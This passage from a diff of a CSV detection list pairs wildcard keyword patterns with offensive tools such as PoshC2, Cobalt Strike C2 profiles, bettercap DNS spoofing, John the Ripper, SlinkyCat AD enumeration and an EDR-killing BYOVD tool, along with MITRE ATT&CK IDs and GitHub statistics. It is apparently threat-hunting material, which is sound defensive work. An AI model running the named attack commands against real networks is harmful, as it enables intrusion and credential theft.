- T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*dllsearcher *.dll*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral 
movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*dmcxblue/SharpBlackout*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" -"*dmg2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*dmg2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*DNet-EnumerateAllDomainUserAccounts*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration 
tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*DNet-ListAccountsByDescription*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*DNet-ListDomainUserAccountsWithCompletedADDescription*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*DNet-ListUsersInDomainAdminsGroup*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*dnf install tor -y*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*dns.spoof on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*dns.spoof.address*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*dns.spoof.all*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*dns.spoof.domains*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network 
Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*dns.spoof.hosts*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*dns_beacon_beacon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_dns_idle*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_dns_sleep*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_dns_ttl*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_get_A*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_get_TXT*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_maxdns*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_ns_response*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 
- T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_put_metadata*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_put_output*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_bruteforce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*dns.spoof on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns.spoof.address*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns.spoof.all*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation 
tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns.spoof.domains*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns.spoof.hosts*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns_beacon_beacon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_idle*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 